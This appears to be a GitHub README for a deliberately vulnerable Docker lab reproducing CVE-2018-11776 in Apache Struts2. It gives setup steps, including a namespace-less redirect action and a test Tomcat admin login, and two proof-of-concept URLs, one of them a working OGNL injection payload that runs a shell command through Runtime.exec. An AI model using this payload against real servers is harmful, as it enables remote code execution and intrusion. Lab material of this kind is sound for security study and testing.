bhdresh/CVE-2018-11776

Vulnerable docker container for CVE-2018-11776

Vulnerable docker container for CVE-2018-11776

# docker pull bhdresh/cve-2018-11776:1.0
# docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

PoC

PoC - 1

Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action

PoC - 2

Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
Result  : This would create a file named 'vulnerable' in /tmp/ directory of docker

Steps to create vulnerable docker container

Create a Dockerfile

FROM ubuntu:latest
RUN apt-get update -y
RUN apt-get upgrade -y
RUN apt-get dist-upgrade -y
RUN apt-get install default-jdk vim net-tools wget -y
EXPOSE 8080

Build a docker

# docker build -t cve-2018-11776 .

Start a docker

# docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash

Login to docker

# docker exec -it cve-2018-11776 /bin/bash

Make followinng changes inside docker

Set up Tomcat:

# mkdir ~/sources
# cd ~/sources
# wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
# tar xvzf apache-tomcat-7.0.90.tar.gz
# mv apache-tomcat-7.0.90 /opt/tomcat

Update bashrc with variables:

# vim ~/.bashrc

export JAVA_HOME=/usr/lib/jvm/default-java
export CATALINA_HOME=/opt/tomcat

# . ~/.bashrc

Add an admin to the Tomact gui:

# vim /opt/tomcat/conf/tomcat-users.xml

<user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />

Start Tomcat server

# $CATALINA_HOME/bin/startup.sh

Upload and deploy a vulnerable Struts2 Showcase through tomcat UI

http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)

Restart Tomcat

# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh

Add a vulnerable redirection action without a namespace:

# vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

  <action name="help">
              <result type="redirectAction">
                      <param name="actionName">date.action</param>
              </result>
  </action>

NOTE: By default, alwaysSelectFullNamespace should be set to True.

Restart Tomcat and check out the Struts2 Showcase page:

# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh

http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

Author

@bhdresh

References

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057